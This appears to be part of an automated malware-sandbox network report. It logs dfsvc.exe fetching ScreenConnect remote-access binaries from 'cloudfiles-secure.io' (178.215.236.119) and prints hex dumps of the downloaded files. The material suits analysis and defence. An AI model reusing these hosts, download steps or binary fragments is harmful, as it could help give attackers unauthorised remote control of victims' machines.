                                                                                                                                                                                                                                                                        2024-10-02 04:23:07 UTC16384INData Raw: 00 00 0a 07 6f 11 00 00 0a 2d d0 de 0a 07 2c 06 07 6f 10 00 00 0a dc 06 7b 54 00 00 04 6f 24 02 00 0a 13 04 2b 5a 11 04 6f 25 02 00 0a 13 05 02 7b 53 00 00 04 7b 0d 00 00 04 11 05 73 26 02 00 0a 25 02 7b 52 00 00 04 28 f8 00 00 0a 7e 30 00 00 04 25 2d 17 26 7e 2b 00 00 04 fe 06 6d 00 00 06 73 06 02 00 0a 25 80 30 00 00 04 28 5f 00 00 2b 6f 27 02 00 0a 73 81 00 00 0a 6f 82 00 00 0a 11 04 6f 11 00 00 0a 2d 9d de 0c 11 04 2c 07 11 04 6f 10 00 00 0a dc 2a 01 1c 00 00 02 00 65 00 34 99 00 0a 00 00 00 00 02 00 b0 00 67 17 01 0c 00 00 00 00 1e 02 28 1d 00 00 0a 2a 56 02 7b 54 00 00 04 03 6f 23 02 00 0a 6f 28 02 00 0a 16 fe 01 2a 1e 02 28 1d 00 00 0a 2a 4a 02 7b 56 00 00 04 6f 29 02 00 0a 03 28 2a 02 00 0a 2a 1e 02 28 1d 00 00 0a 2a 00 00 00 13 30 03 00 43 00 00
                                                                                                                                                                                                                                                                        Data Ascii: o-,o{To$+Zo%{S{s&%{R(~0%-&~+ms%0(_+o'soo-,o*e4g(*V{To#o(*(*J{Vo)(**(*0C
                                                                                                                                                                                                                                                                        2024-10-02 04:23:07 UTC16384INData Raw: 27 15 19 04 ae 2d 2d 15 19 04 cd 2e 37 15 b1 04 3c 27 3e 15 31 04 cb 31 78 09 29 04 e0 42 f6 00 e9 04 fe 42 56 15 f4 00 9b 18 81 02 31 04 a5 32 5c 15 f4 03 71 3a a1 00 fc 03 71 3a a1 00 19 04 ca 2d 85 15 11 03 71 3a 6a 04 09 03 5e 30 9e 15 d9 07 e5 35 a7 15 09 03 42 2c ad 15 e1 07 6b 29 06 00 19 03 5d 31 20 02 31 04 83 2d bd 15 29 04 84 31 6a 04 19 03 80 25 20 02 29 04 ad 25 6a 04 19 03 99 1b 20 02 29 04 c6 1b 6a 04 e1 07 61 29 06 00 21 03 f7 2e 20 02 d1 00 ea 49 c5 15 29 04 04 2f 6a 04 a9 04 31 3d b2 11 8c 03 8d 08 5a 04 e9 04 b2 49 bd 0a 04 04 f8 3e 46 00 8c 03 52 0b 5e 04 e9 04 cd 42 d8 15 31 04 e2 34 e0 15 29 04 e0 46 14 01 d1 01 9a 42 ef 15 5c 02 de 2c 63 00 09 02 e1 2e 14 01 69 02 c8 41 00 16 69 02 c3 17 14 01 29 05 7a 2d f6 00 59 03 d0 2d 06 16 a4
                                                                                                                                                                                                                                                                        Data Ascii: '--.7<'>11x)BBV12\q:q:-q:j^05B,k)]1 1-)1j% )%j )ja)!. I)/j1=ZI>FR^B14)FB\,c.iAi)z-Y-
                                                                                                                                                                                                                                                                        2024-10-02 04:23:07 UTC16384INData Raw: 69 74 79 41 63 74 69 6f 6e 00 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 00 53 65 74 74 69 6e 67 73 50 72 6f 70 65 72 74 79 56 61 6c 75 65 43 6f 6c 6c 65 63 74 69 6f 6e 00 47 72 6f 75 70 43 6f 6c 6c 65 63 74 69 6f 6e 00 57 61 69 74 69 6e 67 46 6f 72 43 6f 6e 6e 65 63 74 69 6f 6e 00 57 69 6e 33 32 45 78 63 65 70 74 69 6f 6e 00 43 72 79 70 74 6f 67 72 61 70 68 69 63 45 78 63 65 70 74 69 6f 6e 00 4e 6f 74 53 75 70 70 6f 72 74 65 64 45 78 63 65 70 74 69 6f 6e 00 54 72 61 63 65 45 78 63 65 70 74 69 6f 6e 00 45 6e 64 4f 66 53 74 72 65 61 6d 45 78 63 65 70 74 69 6f 6e 00 52 75 6e 57 69 74 68 43 72 61 73 68 4f 6e 45 78 63 65 70 74 69 6f 6e 00 54 72 79 53 75 62 73 63 72 69 62 65 54 6f 4c 6f 67 41 70 70 44 6f 6d 61 69 6e 45 78 63 65 70 74 69 6f 6e 00 49 6e
                                                                                                                                                                                                                                                                        Data Ascii: ityActionSystem.ReflectionSettingsPropertyValueCollectionGroupCollectionWaitingForConnectionWin32ExceptionCryptographicExceptionNotSupportedExceptionTraceExceptionEndOfStreamExceptionRunWithCrashOnExceptionTrySubscribeToLogAppDomainExceptionIn
                                                                                                                                                                                                                                                                        2024-10-02 04:23:07 UTC2776INData Raw: 00 08 01 00 00 08 00 00 00 00 05 01 00 01 00 00 05 01 00 02 00 00 0a 01 00 02 00 00 00 00 01 00 00 20 01 00 03 00 00 00 09 53 65 73 73 69 6f 6e 49 44 04 4e 61 6d 65 08 55 73 65 72 4e 61 6d 65 00 00 0d 01 00 05 00 00 00 00 00 00 00 01 00 00 2d 01 00 02 00 00 00 1c 43 72 65 64 65 6e 74 69 61 6c 50 72 6f 76 69 64 65 72 49 6e 73 74 61 6e 63 65 49 44 07 4d 65 73 73 61 67 65 00 00 0b 01 00 03 00 00 00 00 01 01 00 00 33 01 00 03 00 00 00 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 0b 43 6f 6d 6d 61 6e 64 4c 69 6e 65 0f 50 61 72 65 6e 74 50 72 6f 63 65 73 73 49 44 00 00 52 01 00 05 00 00 00 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 0b 43 6f 6d 6d 61 6e 64 4c 69 6e 65 0f 50 61 72 65 6e 74 50 72 6f 63 65 73 73 49 44 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68
                                                                                                                                                                                                                                                                        Data Ascii: SessionIDNameUserName-CredentialProviderInstanceIDMessage3ExecutablePathCommandLineParentProcessIDRExecutablePathCommandLineParentProcessIDExecutablePath


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        10192.168.2.549739178.215.236.1194431196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-10-02 04:23:08 UTC98OUTGET /Bin/ScreenConnect.Windows.dll HTTP/1.1
                                                                                                                                                                                                                                                                        Host: cloudfiles-secure.io
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                        2024-10-02 04:23:08 UTC218INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                                        Content-Length: 1721856
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                        Date: Wed, 02 Oct 2024 04:23:08 GMT
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2024-10-02 04:23:08 UTC16166INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c da d0 ab 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 3e 1a 00 00 06 00 00 00 00 00 00 82 5d 1a 00 00 20 00 00 00 60 1a 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 1a 00 00 02 00 00 5b ab 1a 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELl" 0>] ` [@
                                                                                                                                                                                                                                                                        2024-10-02 04:23:08 UTC16384INData Raw: 00 00 0a 14 04 05 16 28 ba 00 00 06 13 06 de 11 09 28 01 02 00 0a dc 06 2c 06 06 6f 11 00 00 0a dc 11 06 2a 00 00 01 34 00 00 02 00 99 00 0a a3 00 0c 00 00 00 00 02 00 81 00 2e af 00 0c 00 00 00 00 02 00 73 00 87 fa 00 07 00 00 00 00 02 00 06 00 fb 01 01 0a 00 00 00 00 13 30 02 00 1f 00 00 00 2a 00 00 11 1f 28 7e 5e 00 00 0a 28 e0 00 00 06 72 71 06 00 70 28 02 02 00 0a 0a 02 06 28 bd 00 00 06 2a 00 13 30 05 00 47 00 00 00 00 00 00 00 03 25 2d 06 26 28 be 00 00 06 18 8d d9 00 00 01 25 16 72 9d 06 00 70 a2 25 17 72 b9 06 00 70 a2 28 03 02 00 0a 7e a7 00 00 04 25 2d 13 26 14 fe 06 04 02 00 0a 73 05 02 00 0a 25 80 a7 00 00 04 02 28 32 00 00 2b 2a 00 1b 30 04 00 90 00 00 00 3a 00 00 11 28 0d 01 00 06 1f 0a 16 20 7c 4f 00 00 73 07 02 00 0a 28 6e 01 00 0a 2c 35
                                                                                                                                                                                                                                                                        Data Ascii: ((,o*4.s0*(~^(rqp((*0G%-&(%rp%rp(~%-&s%(2+*0:( |Os(n,5
                                                                                                                                                                                                                                                                        2024-10-02 04:23:08 UTC16384INData Raw: fc 00 00 04 7d f8 00 00 04 02 17 7d f7 00 00 04 17 2a 02 15 7d f7 00 00 04 02 02 7b fc 00 00 04 18 28 aa 01 00 06 7d fc 00 00 04 02 7b fc 00 00 04 16 d3 28 84 00 00 0a 2d c3 16 2a 1e 02 7b f8 00 00 04 2a 1a 73 7b 01 00 0a 7a 32 02 7b f8 00 00 04 8c ce 00 00 01 2a 00 00 13 30 02 00 3c 00 00 00 88 00 00 11 02 7b f7 00 00 04 1f fe 33 1d 02 7b f9 00 00 04 28 4e 03 00 0a 6f 4f 03 00 0a 33 0b 02 16 7d f7 00 00 04 02 0a 2b 07 16 73 4d 03 00 06 0a 06 02 7b fb 00 00 04 7d fa 00 00 04 06 2a 1e 02 28 53 03 00 06 2a 7a 02 28 2c 00 00 0a 02 03 7d fd 00 00 04 02 28 4e 03 00 0a 6f 4f 03 00 0a 7d ff 00 00 04 2a 06 2a 00 00 00 13 30 05 00 d5 00 00 00 89 00 00 11 02 7b fd 00 00 04 0a 06 2c 09 06 17 3b 8d 00 00 00 16 2a 02 15 7d fd 00 00 04 1f 09 0b 02 17 07 25 17 58 0b 1f
                                                                                                                                                                                                                                                                        Data Ascii: }}*}{(}{(-*{*s{z2{*0<{3{(NoO3}+sM{}*(S*z(,}(NoO}**0{,;*}%X
                                                                                                                                                                                                                                                                        2024-10-02 04:23:08 UTC16384INData Raw: 6e 22 06 00 71 cc 6e 22 06 00 48 cf 6e 22 06 00 5e 3e 6e 22 06 00 9f a3 6e 22 06 00 c4 b2 a0 02 06 00 36 b2 6e 22 06 00 49 a7 a0 02 06 00 41 a7 6e 22 06 00 81 cc 6e 22 06 00 af 54 6e 22 06 00 ba 90 6e 22 06 00 9f a3 6e 22 06 00 7c aa 6e 22 06 00 f7 cf 71 22 06 00 ce 45 71 22 06 00 66 46 6e 22 06 00 07 59 6e 22 06 00 b6 bf 6e 22 06 00 31 6a 6e 22 06 00 8f 9f 6e 22 06 00 e8 60 6e 22 06 00 48 cf 6e 22 06 00 f4 5f 6e 22 06 00 04 52 25 25 06 00 e3 be 6e 22 06 00 5b be 6e 22 06 10 55 51 f7 25 06 06 80 30 af 08 56 80 80 c8 fb 25 56 80 69 c8 fb 25 06 06 80 30 af 08 56 80 35 9d 00 26 06 06 80 30 af 08 56 80 62 27 05 26 56 80 90 29 05 26 56 80 e3 0d 05 26 56 80 86 29 05 26 06 06 80 30 6e 22 56 80 2c 39 0a 26 56 80 97 c8 0a 26 56 80 5f 39 0a 26 56 80 60 bd 0a 26 56
                                                                                                                                                                                                                                                                        Data Ascii: n"qn"Hn"^>n"n"6n"IAn"n"Tn"n"n"|n"q"Eq"fFn"Yn"n"1jn"n"`n"Hn"_n"R%%n"[n"UQ%0V%Vi%0V5&0Vb'&V)&V&V)&0n"V,9&V&V_9&V`&V
                                                                                                                                                                                                                                                                        2024-10-02 04:23:08 UTC16384INData Raw: c6 00 5e 53 10 00 0f 07 5e a5 00 00 00 00 91 18 18 99 0e 27 10 07 6a a5 00 00 00 00 86 18 ed 98 01 00 10 07 72 a5 00 00 00 00 83 00 d7 02 29 3b 10 07 7a a5 00 00 00 00 83 00 81 0a 30 3b 12 07 82 a5 00 00 00 00 86 18 ed 98 01 00 13 07 8a a5 00 00 00 00 83 00 d6 07 1b 3b 13 07 9d a5 00 00 00 00 91 18 18 99 0e 27 14 07 a9 a5 00 00 00 00 86 18 ed 98 01 00 14 07 b1 a5 00 00 00 00 83 00 ab 02 39 3b 14 07 b9 a5 00 00 00 00 83 00 55 0a 39 3b 15 07 c1 a5 00 00 00 00 86 18 ed 98 05 00 16 07 e0 a5 00 00 00 00 e1 01 ac 58 01 00 17 07 18 a6 00 00 00 00 e1 01 37 c2 3d 00 17 07 e4 a7 00 00 00 00 81 00 d5 0d 01 00 17 07 00 a8 00 00 00 00 e1 09 d0 bb e0 18 17 07 08 a8 00 00 00 00 e1 01 13 b6 01 00 17 07 0f a8 00 00 00 00 e1 09 96 bc 4e 00 17 07 18 a8 00 00 00 00 e1 01 bd
                                                                                                                                                                                                                                                                        Data Ascii: ^S^'jr);z0;;'9;U9;X7=N
                                                                                                                                                                                                                                                                        2024-10-02 04:23:08 UTC16384INData Raw: 5b 34 45 10 a9 06 0b 5f 39 02 3c 04 8d 4a a0 02 91 04 5f 46 01 00 89 06 8d 58 39 02 d1 03 86 c7 01 00 69 04 a6 58 01 00 71 09 dc 37 b1 1a 71 09 1c 36 89 01 59 06 ab cc e9 1a e1 02 ed 98 f8 1a e1 02 ed 98 07 1b 41 06 ed 98 10 00 b9 08 ae 9e 16 1b 19 0a 85 3e 1d 1b 29 02 96 4c 7c 04 31 02 ed 98 01 00 99 04 68 53 f5 09 c1 09 21 5b 10 00 39 02 96 4c 7c 04 39 02 35 70 89 01 99 02 e2 6a 7c 04 99 02 28 59 3b 1b b1 07 1b 6b 3d 0b 4c 04 a8 98 5b 00 54 04 b5 bc 49 00 44 02 ab 0d d9 00 08 00 14 00 25 1c 08 00 18 00 2a 1c 08 00 1c 00 2f 1c 08 00 20 00 34 1c 08 00 b8 00 39 1c 0e 00 bc 00 3e 1c 0e 00 c0 00 51 1c 0e 00 c4 00 62 1c 08 00 c8 00 75 1c 08 00 cc 00 7a 1c 0e 00 d0 00 7f 1c 0e 00 d4 00 8e 1c 0e 00 d8 00 9d 1c 0e 00 e0 00 c6 1c 08 00 f0 00 64 1d 08 00 f4 00 69
                                                                                                                                                                                                                                                                        Data Ascii: [4E_9<J_FX9iXq7q6YA>)L|1hS![9L|95pj|(Y;k=L[TID%*/ 49>Qbuzdi
                                                                                                                                                                                                                                                                        2024-10-02 04:23:08 UTC16384INData Raw: 3e 39 5f 5f 31 33 35 5f 31 00 3c 47 65 74 46 75 6c 6c 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 3e 62 5f 5f 31 33 35 5f 31 00 3c 3e 63 5f 5f 44 69 73 70 6c 61 79 43 6c 61 73 73 34 37 5f 31 00 3c 43 6f 6e 6e 65 63 74 53 65 72 76 65 72 43 6c 69 65 6e 74 4e 61 6d 65 64 50 69 70 65 73 3e 67 5f 5f 57 61 69 74 41 6e 64 43 6f 6e 6e 65 63 74 4e 61 6d 65 64 50 69 70 65 7c 39 37 5f 31 00 3c 50 6f 70 75 6c 61 74 65 43 6f 6e 74 65 78 74 4d 65 6e 75 53 74 72 69 70 49 74 65 6d 73 3e 62 5f 5f 37 5f 31 00 3c 3e 39 5f 5f 38 5f 31 00 3c 50 6f 70 75 6c 61 74 65 43 6f 6e 74 65 78 74 4d 65 6e 75 53 74 72 69 70 49 74 65 6d 73 3e 62 5f 5f 38 5f 31 00 3c 3e 39 5f 5f 32 39 5f 31 00 3c 54 72 79 47 65 74 41 63 74 69 76 65 43 6f 6e 73 6f 6c 65 53 65 73 73 69 6f 6e 49 44 3e 62 5f 5f
                                                                                                                                                                                                                                                                        Data Ascii: >9__135_1<GetFullExecutablePath>b__135_1<>c__DisplayClass47_1<ConnectServerClientNamedPipes>g__WaitAndConnectNamedPipe|97_1<PopulateContextMenuStripItems>b__7_1<>9__8_1<PopulateContextMenuStripItems>b__8_1<>9__29_1<TryGetActiveConsoleSessionID>b__
                                                                                                                                                                                                                                                                        2024-10-02 04:23:08 UTC16384INData Raw: 62 61 73 65 4b 65 79 48 61 6e 64 6c 65 00 6c 69 62 72 61 72 79 48 61 6e 64 6c 65 00 72 65 73 75 6d 65 5f 68 61 6e 64 6c 65 00 54 6f 52 65 63 74 61 6e 67 6c 65 00 47 65 74 43 6c 69 65 6e 74 52 65 63 74 61 6e 67 6c 65 00 47 65 74 57 69 6e 64 6f 77 52 65 63 74 61 6e 67 6c 65 00 72 65 63 74 61 6e 67 6c 65 00 70 44 61 74 61 46 69 6c 65 00 75 6c 6c 54 6f 74 61 6c 50 61 67 65 46 69 6c 65 00 75 6c 6c 41 76 61 69 6c 50 61 67 65 46 69 6c 65 00 43 72 65 61 74 65 46 69 6c 65 00 68 54 65 6d 70 6c 61 74 65 46 69 6c 65 00 44 65 6c 65 74 65 46 69 6c 65 00 4d 6f 76 65 46 69 6c 65 00 70 43 6f 6e 66 69 67 46 69 6c 65 00 54 72 79 55 6e 62 6c 6f 63 6b 46 69 6c 65 00 4c 6f 61 64 52 65 73 6f 75 72 63 65 50 61 63 6b 46 72 6f 6d 46 69 6c 65 00 4d 61 70 46 69 6c 65 00 70 48 65 6c
                                                                                                                                                                                                                                                                        Data Ascii: baseKeyHandlelibraryHandleresume_handleToRectangleGetClientRectangleGetWindowRectanglerectanglepDataFileullTotalPageFileullAvailPageFileCreateFilehTemplateFileDeleteFileMoveFilepConfigFileTryUnblockFileLoadResourcePackFromFileMapFilepHel
                                                                                                                                                                                                                                                                        2024-10-02 04:23:08 UTC16384INData Raw: 70 00 3c 39 3e 5f 5f 43 6c 6f 73 65 44 65 73 6b 74 6f 70 00 43 72 65 61 74 65 44 65 73 6b 74 6f 70 00 53 77 69 74 63 68 44 65 73 6b 74 6f 70 00 4f 70 65 6e 44 65 73 6b 74 6f 70 00 6c 70 44 65 73 6b 74 6f 70 00 54 72 79 45 6e 73 75 72 65 54 68 72 65 61 64 4f 6e 49 6e 70 75 74 44 65 73 6b 74 6f 70 00 4f 70 65 6e 49 6e 70 75 74 44 65 73 6b 74 6f 70 00 6c 70 73 7a 44 65 73 6b 74 6f 70 00 64 65 73 6b 74 6f 70 00 65 5f 73 70 00 55 72 69 53 63 68 65 6d 65 48 74 74 70 00 4e 61 74 69 76 65 43 6c 65 61 6e 75 70 00 6c 70 4c 6f 61 64 4f 72 64 65 72 47 72 6f 75 70 00 47 65 74 4c 61 73 74 41 63 74 69 76 65 50 6f 70 75 70 00 41 70 70 44 6f 6d 61 69 6e 53 65 74 75 70 00 70 73 7a 56 65 6e 64 6f 72 53 65 74 75 70 00 66 43 6f 6e 74 65 78 74 52 65 71 00 53 79 73 74 65 6d 2e
                                                                                                                                                                                                                                                                        Data Ascii: p<9>__CloseDesktopCreateDesktopSwitchDesktopOpenDesktoplpDesktopTryEnsureThreadOnInputDesktopOpenInputDesktoplpszDesktopdesktope_spUriSchemeHttpNativeCleanuplpLoadOrderGroupGetLastActivePopupAppDomainSetuppszVendorSetupfContextReqSystem.
                                                                                                                                                                                                                                                                        2024-10-02 04:23:08 UTC16384INData Raw: 00 4f 70 65 6e 52 65 67 69 73 74 72 79 4b 65 79 00 43 72 65 61 74 65 50 72 6f 70 65 72 74 79 4b 65 79 00 47 65 74 48 6f 74 6b 65 79 00 53 65 74 48 6f 74 6b 65 79 00 70 77 48 6f 74 6b 65 79 00 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 43 72 79 70 74 6f 67 72 61 70 68 79 00 67 65 74 5f 41 73 73 65 6d 62 6c 79 00 67 65 74 5f 46 6f 6e 74 46 61 6d 69 6c 79 00 44 65 66 61 75 6c 74 46 6f 6e 74 46 61 6d 69 6c 79 00 54 72 79 44 69 73 61 62 6c 65 46 69 6c 65 53 79 73 74 65 6d 52 65 64 69 72 65 63 74 69 6f 6e 54 65 6d 70 6f 72 61 72 69 6c 79 00 73 65 74 5f 52 65 61 64 4f 6e 6c 79 00 44 69 73 70 6f 73 65 51 75 69 65 74 6c 79 00 70 6f 69 6e 74 6c 79 00 53 65 6c 65 63 74 4d 61 6e 79 00 53 68 75 74 64 6f 77 6e 42 6c 6f 63 6b 52 65 61 73 6f 6e 44 65 73 74 72 6f 79
                                                                                                                                                                                                                                                                        Data Ascii: OpenRegistryKeyCreatePropertyKeyGetHotkeySetHotkeypwHotkeySystem.Security.Cryptographyget_Assemblyget_FontFamilyDefaultFontFamilyTryDisableFileSystemRedirectionTemporarilyset_ReadOnlyDisposeQuietlypointlySelectManyShutdownBlockReasonDestroy


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        11192.168.2.549742178.215.236.1194431196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-10-02 04:23:10 UTC104OUTGET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1
                                                                                                                                                                                                                                                                        Host: cloudfiles-secure.io
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                        2024-10-02 04:23:11 UTC217INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                                        Content-Length: 601376
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                        Date: Wed, 02 Oct 2024 04:23:10 GMT
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2024-10-02 04:23:11 UTC16167INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7b 3c 99 98 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 fc 08 00 00 06 00 00 00 00 00 00 92 15 09 00 00 20 00 00 00 20 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 09 00 00 02 00 00 19 78 09 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL{<"0 @ `x@
                                                                                                                                                                                                                                                                        2024-10-02 04:23:11 UTC16384INData Raw: 00 0a 2a 00 00 1b 30 06 00 ef 0d 00 00 2c 00 00 11 73 ab 07 00 06 0a 06 02 7d 14 03 00 04 28 75 01 00 0a 2c 1c 72 9d 0a 00 70 17 17 28 76 01 00 0a 28 77 01 00 0a 16 8d 11 00 00 01 28 78 01 00 0a 02 17 7d 48 00 00 04 02 28 e4 00 00 06 17 28 cf 01 00 0a 0b 02 28 fd 00 00 06 0c 02 28 dc 00 00 06 7e a9 02 00 04 25 2d 17 26 7e 96 02 00 04 fe 06 25 07 00 06 73 d0 01 00 0a 25 80 a9 02 00 04 28 33 00 00 2b 6f d1 01 00 0a 0d 38 24 0c 00 00 12 04 09 6f d2 01 00 0a 7d 16 03 00 04 11 04 7b 16 03 00 04 28 2c 00 00 2b 13 05 11 04 7b 16 03 00 04 6f 15 03 00 06 28 36 06 00 06 13 06 11 04 7b 16 03 00 04 6f 29 03 00 06 28 4a 06 00 06 13 07 11 04 7b 16 03 00 04 6f 2a 03 00 06 28 4a 06 00 06 13 08 11 04 7b 16 03 00 04 6f 15 03 00 06 02 28 fb 00 00 06 25 13 0e 6f a2 00 00 0a
                                                                                                                                                                                                                                                                        Data Ascii: *0,s}(u,rp(v(w(x}H((((~%-&~%s%(3+o8$o}{(,+{o(6{o)(J{o*(J{o(%o
                                                                                                                                                                                                                                                                        2024-10-02 04:23:11 UTC16384INData Raw: 02 7b 54 00 00 04 6f 0b 07 00 06 18 2e 0c 02 7b 54 00 00 04 16 6f a2 00 00 0a 2a 00 00 13 30 03 00 62 00 00 00 00 00 00 00 02 7b 54 00 00 04 6f 14 03 00 0a 2c 4d 02 7b 5a 00 00 04 28 a9 00 00 06 6f b8 04 00 06 02 7b 54 00 00 04 16 6f a2 00 00 0a 02 7b 54 00 00 04 02 7b 54 00 00 04 6f 14 03 00 0a 74 9a 00 00 01 17 6f 15 03 00 0a 26 02 7b 54 00 00 04 14 6f 7b 01 00 0a 02 17 28 3c 01 00 06 2a 02 16 28 3c 01 00 06 2a 00 00 13 30 05 00 90 00 00 00 47 00 00 11 72 1d 14 00 70 18 8d 11 00 00 01 25 16 03 8c 33 02 00 01 a2 25 17 02 7b 54 00 00 04 6f 0b 07 00 06 8c b6 00 00 02 a2 28 07 03 00 0a 02 7b 54 00 00 04 6f 0b 07 00 06 0a 06 17 2e 06 06 18 2e 27 2b 35 02 7b 5a 00 00 04 28 aa 00 00 06 6f b8 04 00 06 03 2d 22 02 28 ae 00 00 06 73 0a 03 00 0a 6f 45 01 00 0a 2b
                                                                                                                                                                                                                                                                        Data Ascii: {To.{To*0b{To,M{Z(o{To{T{Toto&{To{(<*(<*0Grp%3%{To({To..'+5{Z(o-"(soE+
                                                                                                                                                                                                                                                                        2024-10-02 04:23:11 UTC16384INData Raw: 73 27 04 00 0a 28 b2 00 00 2b 28 b3 00 00 2b 6f 28 04 00 0a 2a c2 02 28 29 04 00 0a 02 7e 2a 04 00 0a 28 2b 04 00 0a 02 20 02 60 00 00 17 28 2c 04 00 0a 02 02 fe 06 dd 01 00 06 73 2d 04 00 0a 28 2e 04 00 0a 2a 1e 02 7b 9b 00 00 04 2a 22 02 03 7d 9b 00 00 04 2a 1e 02 7b 9c 00 00 04 2a 22 02 03 7d 9c 00 00 04 2a 1e 02 7b 9d 00 00 04 2a 22 02 03 7d 9d 00 00 04 2a 1e 02 7b 9e 00 00 04 2a 22 02 03 7d 9e 00 00 04 2a 1e 02 7b 9f 00 00 04 2a 22 02 03 7d 9f 00 00 04 2a 1e 02 7b a0 00 00 04 2a 22 02 03 7d a0 00 00 04 2a 1e 02 7b a1 00 00 04 2a 22 02 03 7d a1 00 00 04 2a 1e 02 7b a2 00 00 04 2a 22 02 03 7d a2 00 00 04 2a 1e 02 7b a3 00 00 04 2a 22 02 03 7d a3 00 00 04 2a 1e 02 7b a4 00 00 04 2a 22 02 03 7d a4 00 00 04 2a 1e 02 7b a5 00 00 04 2a 22 02 03 7d a5 00 00
                                                                                                                                                                                                                                                                        Data Ascii: s'(+(+o(*()~*(+ `(,s-(.*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}
                                                                                                                                                                                                                                                                        2024-10-02 04:23:11 UTC16384INData Raw: 00 0a 2c 07 02 28 a4 02 00 06 2a 02 6f 18 04 00 0a 2a 00 00 00 13 30 02 00 51 00 00 00 93 00 00 11 02 28 61 05 00 0a 2d 1d 02 28 9b 02 00 06 12 00 fe 15 1d 00 00 01 06 28 62 05 00 0a 2c 07 02 28 9b 02 00 06 2a 02 7b ef 00 00 04 2c 1d 02 28 a2 02 00 06 12 00 fe 15 1d 00 00 01 06 28 62 05 00 0a 2c 07 02 28 a2 02 00 06 2a 02 6f 17 04 00 0a 2a d6 02 28 61 05 00 0a 2d 0f 02 28 9f 02 00 06 2c 07 02 28 9f 02 00 06 2a 02 7b ef 00 00 04 2c 0f 02 28 a6 02 00 06 2c 07 02 28 a6 02 00 06 2a 02 6f c6 04 00 0a 2a d6 02 28 61 05 00 0a 2d 0f 02 28 a1 02 00 06 2c 07 02 28 a1 02 00 06 2a 02 7b ef 00 00 04 2c 0f 02 28 aa 02 00 06 2c 07 02 28 aa 02 00 06 2a 02 28 99 02 00 06 2a 00 00 00 1b 30 06 00 f0 00 00 00 94 00 00 11 02 03 28 ce 01 00 06 02 6f c4 02 00 06 0a 12 00 28 63
                                                                                                                                                                                                                                                                        Data Ascii: ,(*o*0Q(a-((b,(*{,((b,(*o*(a-(,(*{,(,(*o*(a-(,(*{,(,(*(*0(o(c
